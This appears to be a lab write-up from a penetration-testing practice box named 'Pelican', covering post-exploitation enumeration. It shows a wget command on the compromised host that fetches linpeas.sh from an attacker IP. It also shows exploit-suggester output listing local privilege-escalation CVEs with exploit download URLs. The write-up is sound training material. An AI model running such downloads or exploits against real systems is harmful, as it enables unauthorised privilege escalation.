PEAS
Conducting an automated enumeration after performing a manual enumeration
charles@pelican:/var/tmp$ wget -q http://192.168.45.192/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Practice/Pelican/4-Post_Enumeration/attachments/{D7DD4D28-AD9C-43BC-9A1B-15A84FA5EAC3}.png)
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
write error: Broken pipe
write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.Sessions
/Practice/Pelican/4-Post_Enumeration/attachments/{1038DE62-5515-49A8-B8C4-84C281898B89}.png)
Cron
/Practice/Pelican/4-Post_Enumeration/attachments/{670DB353-1362-4A0D-B0AD-BD8C5508ADBF}.png)
sudo privileges (charles)
/Practice/Pelican/4-Post_Enumeration/attachments/{1D78523B-495B-4DE9-9352-987E9B4E7310}.png)
Installed Programs
/Practice/Pelican/4-Post_Enumeration/attachments/{5E10E776-3306-4A70-BA40-7B74BF7008DE}.png)
nginx
/Practice/Pelican/4-Post_Enumeration/attachments/{2C01084A-7B71-4DC6-A06F-9E7A0465BA3C}.png)
MariaDB
/Practice/Pelican/4-Post_Enumeration/attachments/{D5EC06DF-2905-470A-9190-557F1EA0B3B2}.png)
SSH
/Practice/Pelican/4-Post_Enumeration/attachments/{67836332-4DA6-4786-9D91-732B18E782B7}.png)
/Practice/Pelican/4-Post_Enumeration/attachments/{08B3555B-485C-488D-8205-8AAAE5C3DA0A}.png)
/Practice/Pelican/4-Post_Enumeration/attachments/{9353FB7A-028C-4E1F-96BB-17C12953E12F}.png)